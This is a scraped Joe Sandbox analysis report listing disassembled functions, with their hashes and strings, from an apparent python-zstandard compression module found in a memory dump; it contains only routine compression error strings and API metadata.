                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeallocEval_Object_SizeThread$Err_$CallMethod_String$FormatRestoreSave$AttrFromLong_Mem_Ssize_t$Arg_Bytes_FreeKeywords_MallocMemoryPackParseTupleTuple_
                                                                                                                                                                                                            • String ID: OO|Kkk:copy_stream$error ending compression stream: %s$error setting source size: %s$first argument must have a read() method$read$read$second argument must have a write() method$write$write$write$zstd compress error: %s
                                                                                                                                                                                                            • API String ID: 3628709344-497378818
                                                                                                                                                                                                            • Opcode ID: f85d096d4a2ae6259158b7b66c6a253cd1d47c2059769f770cd4d64cc5c98270
                                                                                                                                                                                                            • Instruction ID: a9f78c2e2e9898f622d3a1630ef2c12d287370b2b0b2b8f3d552b822ae4591f0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f85d096d4a2ae6259158b7b66c6a253cd1d47c2059769f770cd4d64cc5c98270
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FC16732A0AB42A5EF10CFA1E8442AC23A4FB49BD8F450132DA1E57BA4DF7CE165D354
                                                                                                                                                                                                            Function 00007FF8A7FF2EA0 Relevance: 59.8, APIs: 26, Strings: 8, Instructions: 343COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Buffer_FreeMem_ReleaseSubtypeType_$Arg_Err_FormatInfoKeywords_ParseSizeSystemTuple
                                                                                                                                                                                                            • String ID: O|y*i:multi_decompress_to_buffer$argument must be list or BufferWithSegments$decompressed_sizes size mismatch; expected %zd, got %zd$decompressed_sizes size mismatch; expected %zd, got %zd$decompressed_sizes size mismatch; expected %zd; got %zd$item %zd has offset outside memory area$item %zd has offset outside memory area$item %zd not a bytes like object
                                                                                                                                                                                                            • API String ID: 2690553434-409420423
                                                                                                                                                                                                            • Opcode ID: 433728c358b811ded5f1e4921bf0b03b81343da6e2e488c74ee29b88c7d0fbbf
                                                                                                                                                                                                            • Instruction ID: 3d96cf7d0840d5cb31e8f060d219495ff5fb5bd76ed20f53042a7eefa5b00374
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 433728c358b811ded5f1e4921bf0b03b81343da6e2e488c74ee29b88c7d0fbbf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF14632A0AB82A2EB14CF65E8402AD73A4FB84BC4F514136DE4E53B64DF7CE596D314
                                                                                                                                                                                                            Function 00007FF8A7FF5190 Relevance: 52.7, APIs: 22, Strings: 8, Instructions: 186threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeallocObject_Size$String$CallErr_Method_$AttrEval_FromLong_Mem_Ssize_tThread$Arg_Bytes_FormatFreeKeywords_MallocMemoryPackParseRestoreSaveTupleTuple_memmove
                                                                                                                                                                                                            • String ID: OO|kk:copy_stream$first argument must have a read() method$read$read$second argument must have a write() method$write$write$zstd decompressor error: %s
                                                                                                                                                                                                            • API String ID: 232765988-3974705440
                                                                                                                                                                                                            • Opcode ID: 942da154b746fd8199c0830da1f4d3ef868b4fa211f6350233e4324c2f322fcd
                                                                                                                                                                                                            • Instruction ID: 4fa80835ef680603d24adfe9c1120d9cce908c495165e1a023cef0e6ab4e3684
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 942da154b746fd8199c0830da1f4d3ef868b4fa211f6350233e4324c2f322fcd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33914822A0AA42A5EF109FA1E9542BC33A0FB58BD8F414132CD4E57BA4DF7CE559D318
                                                                                                                                                                                                            Function 00007FF8A80036D0 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 220COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_funcfree$malloc$fflushfprintfmemmove$ConditionCriticalSectionVariableWake$EnterLeavememset
                                                                                                                                                                                                            • String ID: Failed to allocate buffers: out of memory$Failed to allocate dmer map: out of memory$Failed to select dictionary
                                                                                                                                                                                                            • API String ID: 2308072146-2024679854
                                                                                                                                                                                                            • Opcode ID: 6268a0e0235e755546f0573adbe0570666d44419044471f0eacc2facb558d2f1
                                                                                                                                                                                                            • Instruction ID: 66c5fbc9e91b0d4d6406dd26af1366295330d147bf3dbbe88cce73a651fc7603
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6268a0e0235e755546f0573adbe0570666d44419044471f0eacc2facb558d2f1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8B1BB22E0AF8196FB118F69E8042B863B0FB59B98F055234DE9D12795EF3CE195C704
                                                                                                                                                                                                            Function 00007FF8A7FF8070 Relevance: 42.3, APIs: 19, Strings: 5, Instructions: 260COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mem_SubtypeType_$Arg_Err_FreeInfoKeywords_MallocMemoryParseSizeSystemTuple
                                                                                                                                                                                                            • String ID: O|i:multi_compress_to_buffer$argument must be list of BufferWithSegments$item %zd not a bytes like object$no source elements found$source elements are empty
                                                                                                                                                                                                            • API String ID: 870350789-2088052565
                                                                                                                                                                                                            • Opcode ID: 24c091ee6772e006b8cdbdda3fc0ab9a81011fcc1d75f9dfa27bf5348192545a
                                                                                                                                                                                                            • Instruction ID: f7e07787bf9d2e99af033ad69a45e55cb73495a98137e314706483ffcd4b28e1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24c091ee6772e006b8cdbdda3fc0ab9a81011fcc1d75f9dfa27bf5348192545a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CB13966B0AF46A6EB04CF66E8402AD33A0FB48BC8F444536CE0E57B64DF78E565D314
                                                                                                                                                                                                            Function 00007FF8A7FF5D90 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$Arg_Buffer_Bytes_Err_FreeFromKeywords_Mem_ParseReleaseSizeTuple
                                                                                                                                                                                                            • String ID: cannot use a decompressobj multiple times$y*:decompress$zstd decompressor error: %s
                                                                                                                                                                                                            • API String ID: 1012876292-1685517491
                                                                                                                                                                                                            • Opcode ID: 5d8e22e1fa8b720a0090868a213d5e5f5dbe289c0a36a0f08daf4c9f587fdc65
                                                                                                                                                                                                            • Instruction ID: 7b6dc0aa92c811c5871dee644f301b9f738c40a50fe92f55db1e53c1fb821f2e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d8e22e1fa8b720a0090868a213d5e5f5dbe289c0a36a0f08daf4c9f587fdc65
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57813432A0AF42A5EF108F60E8502AC23A4FB48BD8F440576DE1E57BE4EF7CE5569354
                                                                                                                                                                                                            Function 00007FF8A7FF4EC0 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 172COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_Buffer_Err_Keywords_ParseReleaseSizeStringTuple
                                                                                                                                                                                                            • String ID: could not determine content size in frame header$decompression error: %s$decompression error: decompressed %zu bytes; expected %llu$decompression error: did not decompress full frame$error determining content size from frame header$frame is too large to decompress on this platform$y*|n:decompress
                                                                                                                                                                                                            • API String ID: 3686958272-2450312357
                                                                                                                                                                                                            • Opcode ID: a416747aaf4e35a34e7fe7a5c46fb5b58e83dac2fb817e4aacb8b3c9f0fe8ede
                                                                                                                                                                                                            • Instruction ID: 5c8530963c4c59e18daa6f3726d77626cbb4f71d1676bdc2607ad9e74ada4940
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a416747aaf4e35a34e7fe7a5c46fb5b58e83dac2fb817e4aacb8b3c9f0fe8ede
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8816D31A0BE02A5EF108F74E9502BC23A1EB54BE4F144535C96D17BE8EFBCE1659354
                                                                                                                                                                                                            Function 00007FF8A7FFA200 Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 249COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Arg_FormatInfoKeywords_ParseSizeStringSystemTuple
                                                                                                                                                                                                            • String ID: cannot define compression_params and threads$cannot define compression_params and write_checksum$cannot define compression_params and write_content_size$cannot define compression_params and write_dict_id$compression_params must be zstd.ZstdCompressionParameters$could not load compression dictionary: %s$could not set compression parameters: %s$dict_data must be zstd.ZstdCompressionDict$level must be less than %d$|iOOOOOi:ZstdCompressor
                                                                                                                                                                                                            • API String ID: 1701209533-1797388729
                                                                                                                                                                                                            • Opcode ID: c87131b106fdc3f3bf4079a85c612735bda85fc2145337c66cc4b347f85175bc
                                                                                                                                                                                                            • Instruction ID: 12b8a811834c1e13ca60b28bf8ffcdefdd9f6934210d01bae8a4e18c4ea519e2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c87131b106fdc3f3bf4079a85c612735bda85fc2145337c66cc4b347f85175bc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EC13522A0AB02A5EF508F71E4502BD23A0EF45BD4F154236DA1D47BD8EFBCE665E314
                                                                                                                                                                                                            Function 00007FF8A8002860 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A80028BC
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A80028CC
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A800290B
                                                                                                                                                                                                            • memmove.VCRUNTIME140 ref: 00007FF8A8002943
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C63
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002C79
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C81
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C8A
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8002BB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002E13
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003A99
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003AA5
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003AF5
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003B5A
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8003A60: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001,?), ref: 00007FF8A8003B63
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A8002A44
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A8002A61
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002A71
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A8002A7B
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8A8002A84
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002A8D
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 00007FF8A8002AA8
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002AD8
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002AE1
                                                                                                                                                                                                            • WakeConditionVariable.KERNEL32 ref: 00007FF8A8002B00
                                                                                                                                                                                                            • memmove.VCRUNTIME140 ref: 00007FF8A8002B16
                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32 ref: 00007FF8A8002B44
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 00007FF8A8002B4D
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002B5A
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002B63
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A8002B6C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$__acrt_iob_func$malloc$memmove$ConditionCriticalSectionVariableWakefflushfprintf$EnterLeavecalloc
                                                                                                                                                                                                            • String ID: Failed to allocate buffers: out of memory$Failed to select dictionary
                                                                                                                                                                                                            • API String ID: 185317096-2728481001
                                                                                                                                                                                                            • Opcode ID: eec1289204db9bbd6d8189598f7cfe18b181aae08da5f71f1b1c958ddfe5a54a
                                                                                                                                                                                                            • Instruction ID: b13c2d17f38c8ad48b90333c52116ad6e40d91d9c0e6ffd3ac20c91fba2817bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eec1289204db9bbd6d8189598f7cfe18b181aae08da5f71f1b1c958ddfe5a54a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93A1AC22A09F969AFB118F29E8012A973B0FB59BD8F045234DE9D13794EF3CE595C314
                                                                                                                                                                                                            Function 00007FF8A7FFA980 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 159COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$Err_$Arg_Bytes_DeallocFromKeywords_ParseSizeTuple
                                                                                                                                                                                                            • String ID: compressor object already finished$error ending compression stream: %s$flush mode not recognized$unhandled flush mode$|i:flush
                                                                                                                                                                                                            • API String ID: 3471821988-3489195408
                                                                                                                                                                                                            • Opcode ID: 450f7c9090263cec9e3de6a1aa98167ad0da3fec27546ba690f12dbe784ffa07
                                                                                                                                                                                                            • Instruction ID: 7bc0c080987b60818e2d371362a3867cad6ccf6332276a8a957483a7f72793fa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 450f7c9090263cec9e3de6a1aa98167ad0da3fec27546ba690f12dbe784ffa07
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC717A32A0AA02A2EE549F26E85457E33A1FF45BD0F540132DE1E076D4DF7CE5A6D314
                                                                                                                                                                                                            Function 00007FF8A7FFB0D0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 134threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$Err_Object_Size$CallDeallocFormatMethod_RestoreSaveString$Arg_AttrFromKeywords_Long_ParseSsize_tTuple
                                                                                                                                                                                                            • String ID: flush$flush$stream is closed$unknown flush_mode: %d$write$zstd compress error: %s$|I:flush
                                                                                                                                                                                                            • API String ID: 3954421489-341752428
                                                                                                                                                                                                            • Opcode ID: 8030a7877b996a179283aea2bfb83627d0fd9555802aa7fd3d9b308509978596
                                                                                                                                                                                                            • Instruction ID: 4b974466e457725832c771be9217f7408ecfd165cced1c4a68a95f4658218409
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8030a7877b996a179283aea2bfb83627d0fd9555802aa7fd3d9b308509978596
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A518F21A0AA42A2EE548F61E85467C33A0FB49BE0F414232CE1E07BA0DF7CE566D314
                                                                                                                                                                                                            Function 00007FF8A7FFE570 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 229COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
